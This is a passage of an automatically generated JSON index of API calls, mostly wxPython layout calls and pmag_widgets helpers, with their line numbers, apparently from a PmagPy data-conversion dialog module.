"attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 481, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 481, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 481, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 481, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 483, "usage_type": "call"}, {"api_name": "wx.ComboBox", "line_number": 484, "usage_type": "call"}, {"api_name": "wx.CB_READONLY", "line_number": 484, "usage_type": "attribute"}, {"api_name": "wx.GridSizer", "line_number": 485, "usage_type": "call"}, {"api_name": "wx.StaticText", "line_number": 486, "usage_type": "call"}, {"api_name": "wx.TE_CENTER", "line_number": 486, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 486, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 487, "usage_type": "call"}, {"api_name": "wx.TE_CENTER", "line_number": 487, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 487, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 488, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 489, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 491, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 495, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 495, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 501, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 501, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 504, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 504, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 507, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 507, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 508, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 508, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 509, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 509, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 510, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 510, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 511, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 511, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 512, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 512, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 514, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 514, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 515, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 515, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 516, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 516, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 517, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 517, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 519, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 519, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 519, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 520, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 520, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 520, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 521, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 525, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 525, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 547, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 547, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 551, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 558, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 558, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 567, "usage_type": "call"}, {"api_name": "os.path", "line_number": 567, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 568, "usage_type": "call"}, {"api_name": "os.path", "line_number": 568, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 571, "usage_type": "call"}, {"api_name": "os.path", "line_number": 571, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 589, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 589, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.generic", "line_number": 700, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 700, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 703, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 703, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 705, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 705, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 716, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 716, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.generic", "line_number": 716, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 716, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 757, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 757, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 758, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 758, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 761, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 761, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 764, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 764, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.experiment_type", "line_number": 767, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 767, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.lab_field", "line_number": 770, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 770, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.specimen_n", "line_number": 773, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 773, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 776, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 776, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 780, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 780, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 787, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 787, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 790, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 790, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 795, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 795, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 800, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 800, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 807, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 807, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 810, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 810, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 813, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 813, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 814, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 814, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 815, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 817, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 817, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 818, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 818, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 819, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 820, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 820, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 821, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 821, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 822, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 822, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 824, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 824, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 825, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 825, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 826, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 826, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 827, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 827, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 828, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 828, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 829, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 829, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 830, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 830, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 831, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 831, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 832, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 832, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 833, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 833, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 834, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 834, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 834, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 835, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 835, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 836, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 836, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 836, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 837, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 838, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 838, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 838, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 841, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 841, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 854, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 858, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 858, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 861, "usage_type": "call"}, {"api_name": "os.path", "line_number": 861, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 862, "usage_type": "call"}, {"api_name": "os.path", "line_number": 862, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic.sio", "line_number": 944, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 944, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 945, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 945, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 947, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 947, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 950, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 950, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.sio", "line_number": 950, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 950, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 960, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 960, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 961, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 961, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 964, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 964, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 968, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 968, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.sampling_particulars", "line_number": 971, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 971, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.lab_field", "line_number": 974, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 974, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 977, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 977, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.specimen_n", "line_number": 981, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 981, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 985, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 985, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 988, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 988, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 993, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 993, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 996, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 996, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 999, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 999, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1001, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1001, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1002, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1002, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1003, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1003, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1004, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1004, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1005, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1005, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1006, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1006, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1007, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1007, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1008, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1008, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1009, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1009, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1010, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1010, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 1012, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 1012, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 1012, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 1013, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1016, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1016, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 1028, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1034, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1034, "usage_type": "name"}, {"api_name": "os.path.split", "line_number": 1036, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1036, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1094, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1094, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.cit", "line_number": 1098, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1098, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 1100, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1100, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1102, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1102, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1105, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1105, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.cit", "line_number": 1105, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1105, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1115, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1115, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 1116, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1116, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 1119, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1119, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1122, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1122, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 1123, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1123, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_file", "line_number": 1126, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1126, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1129, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1129, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.experiment_type", "line_number": 1133, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1133, "usage_type": "name"}, {"api_name": "wx.StaticBoxSizer", "line_number": 1138, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 1138, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 1138, "usage_type": "attribute"}, {"api_name": "wx.HORIZONTAL", "line_number": 1138, "usage_type": "attribute"}, {"api_name": "wx.TextCtrl", "line_number": 1140, "usage_type": "call"}, {"api_name": "wx.StaticText", "line_number": 1141, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.lab_field", "line_number": 1144, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1144, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1148, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1148, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 1151, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1151, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1155, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1155, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 1162, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1162, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 1166, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1166, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1169, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 1169, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1171, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1171, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1172, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1172, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1173, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1173, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1174, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1174, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1175, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1175, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1176, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1176, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1177, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1177, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1178, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1178, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1179, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1179, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1180, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1180, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1181, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1181, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1183, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1183, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 1184, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 1184, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 1184, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 1185, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 1188, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1188, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.on_add_file_button", "line_number": 1202, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1202, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 1208, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1212, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1212, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 1216, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1216, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1218, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1218, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1219, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1219, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1221, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1221, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1222, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1222, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1224, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1224, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1225, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1225, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1227, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1227, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1228, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1228, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 1230, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1230, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 1231, "usage_type": "call"}, {"api_name": "os.path", "line_number": 1231, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1240, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1240, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.huji", "line_number": 1277, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1277, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.close_window", "line_number": 1279, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1279, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.simple_warning", "line_number": 1281, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1281, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.on_helpButton", "line_number": 1284, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1284, "usage_type": "name"}, {"api_name": "pmagpy.convert_2_magic.huji.__doc__", "line_number": 1284, "usage_type": "call"}, {"api_name": "pmagpy.convert_2_magic.huji", "line_number": 1284, "usage_type": "attribute"}, {"api_name": "pmagpy.convert_2_magic", "line_number": 1284, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1294, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 1294, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 1295, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1295, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.choose_dir", "line_number": 1299, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1299, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.sampling_particulars", "line_number": 1302, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1302, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_ncn", "line_number": 1306, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1306, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1310, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1310, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.select_specimen_ocn", "line_number": 1313, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1313, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1317, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1317, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.labeled_text_field", "line_number": 1321, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1321, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.replicate_measurements", "line_number": 1324, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1324, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.site_lat_lon", "line_number": 1327, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1327, "usage_type": "name"}, {"api_name": "dialogs.pmag_widgets.btn_panel", "line_number": 1330, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 1330, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 1333, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 1333, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1335, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1335, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1336, "usage_type": "attribute"}, {"api_name": "wx.TOP", "line_number": 1336, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 1337, "usage_type": 